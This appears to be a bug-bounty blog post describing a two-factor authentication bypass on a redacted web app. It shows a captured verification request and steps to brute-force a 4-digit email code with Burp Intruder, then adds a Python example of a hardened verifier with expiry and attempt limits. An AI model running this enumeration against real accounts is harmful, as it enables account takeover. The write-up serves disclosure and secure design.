Two-Factor Authentication (2FA) Bypass

Saeid Khater
3 min read · May 23, 2024


Overview of the Vulnerability:

In cybersecurity, two-factor authentication (2FA) is one of the most effective ways to secure online accounts. It adds a second layer of security on top of the password, such as a code sent via SMS or generated by an authenticator app. However, if 2FA is not implemented properly, attackers can exploit weaknesses in the implementation to bypass this layer entirely.

Steps:

  1. Create an account with an email address; I used free@Palestine.com.
  2. The app now sends a verification code to your email (free@Palestine.com) and redirects you to https://app.[Redacted].com/register/code-verification.
     (Screenshot: message in mailbox)
  3. Enter any random code; I used 5555 as the 2FA code.

  4. Enable an HTTP interception proxy, such as Burp Suite or OWASP ZAP, and capture the request.

Request:

POST /api/auth/resolve-email-verification-code HTTP/2
Host: app.Redacted.com
Cookie: [Redacted]
Content-Length: 38
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Pragma: no-cache
Sec-Ch-Ua-Mobile: ?0
X-Site-Context: [Redacted]
User-Agent: [Redacted]
Content-Type: application/json
Accept: application/json, text/plain, */*
X-Client-Data: [Redacted]
Sec-Ch-Ua-Platform: "Linux"
Origin: [Redacted]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [Redacted]
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{"email":"free@Palestine.com","code":5555}

  5. I used Intruder in Burp: the verification code value is the payload position, and the payload is the numbers from 0000 to 9999.
     (Screenshot: Intruder)
  6. After starting the attack, within a few minutes I bypassed the check with the valid code “6712”, and login was successful.

The site was also affected by the same vulnerability on another endpoint, https://app.[Redacted].com/login/code-verification, which likewise allows two-factor authentication to be bypassed.

This is due to two reasons. First, even though there is a temporary ban (rate limit) on confirming the verification code, the code stays valid for longer than the stated “10 minutes”, so the limit can simply be waited out.
Second, the verification code should be 6 or more digits, or a combination of letters and digits, as secure design requires; a 4-digit numeric code has only 10,000 possible values.
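The two reasons above describe what a correct verifier has to do. The following is an added example, not the affected site's code or the author's: a minimal server-side verification routine with a 6-character alphanumeric code, a hard 10-minute lifetime, and an attempt cap that is tied to the issued code itself, so a temporary rate limit cannot be waited out while the same code stays valid. The names (VerificationService, PendingCode, MAX_ATTEMPTS), the cap of 5 attempts, and the example address are assumptions; the 10-minute lifetime is the one the report quotes.

```python
"""Hardened e-mail verification-code check (added example, not the affected site's code)."""
import hmac
import secrets
import string
from dataclasses import dataclass, field
from typing import Callable, Dict

# Assumed policy values for this example; the report itself only quotes the 10-minute lifetime.
CODE_ALPHABET = string.ascii_uppercase + string.digits   # 36 symbols
CODE_LENGTH = 6                                          # 36**6 candidates instead of 10**4 for "5555"-style codes
CODE_TTL_SECONDS = 600                                   # the "10 minutes" mentioned in the report
MAX_ATTEMPTS = 5                                         # guesses allowed per issued code (assumed)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidate codes an attacker would have to enumerate."""
    return alphabet_size ** length


@dataclass
class PendingCode:
    secret: str
    issued_at: float
    attempts: int = 0


@dataclass
class VerificationService:
    """Server-side state for pending codes, keyed by the e-mail address being verified."""
    now: Callable[[], float]                              # injectable clock so expiry is testable offline
    pending: Dict[str, PendingCode] = field(default_factory=dict)

    def issue(self, email: str) -> str:
        """Generate and store a fresh code; a new code always replaces the previous one."""
        code = "".join(secrets.choice(CODE_ALPHABET) for _ in range(CODE_LENGTH))
        self.pending[email] = PendingCode(secret=code, issued_at=self.now())
        return code  # would be e-mailed in production; returned here so the example is self-contained

    def verify(self, email: str, submitted) -> str:
        """Return one of: ok, wrong_code, expired, locked, no_pending_code."""
        entry = self.pending.get(email)
        if entry is None:
            return "no_pending_code"
        if self.now() - entry.issued_at > CODE_TTL_SECONDS:
            del self.pending[email]                       # a stale code is discarded, never kept alive
            return "expired"
        entry.attempts += 1
        if entry.attempts > MAX_ATTEMPTS:
            del self.pending[email]                       # the code itself dies with the lockout
            return "locked"
        # JSON clients may send the code as a number ({"code":5555}); normalise to text and
        # compare in constant time so the check leaks nothing about how many characters matched.
        candidate = str(submitted).strip().upper().encode("utf-8")
        if hmac.compare_digest(candidate, entry.secret.encode("utf-8")):
            del self.pending[email]                       # single use
            return "ok"
        return "wrong_code"


if __name__ == "__main__":
    clock = [0.0]
    svc = VerificationService(now=lambda: clock[0])
    code = svc.issue("user@example.com")                  # constructed address
    print("4-digit numeric keyspace:", keyspace(10, 4))
    print("6-char alphanumeric keyspace:", keyspace(36, 6))
    print("correct code:", svc.verify("user@example.com", code))
```

The difference from the behaviour the report describes is that the lockout invalidates the code rather than merely pausing the endpoint: once the cap is reached, even the right code is refused and the user must request a new one, so an enumeration like the 0000 to 9999 run in step 5 can never reach a code that is still valid.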

Impact

  1. Account takeover
  2. Creation of large numbers of fake accounts
  3. Consumption of server resources
  4. The cost of sending verification emails
  5. Loss of user confidence

Duplicate ):


Written by Saeid Khater

Web Developer | Penetration tester | Bug hunter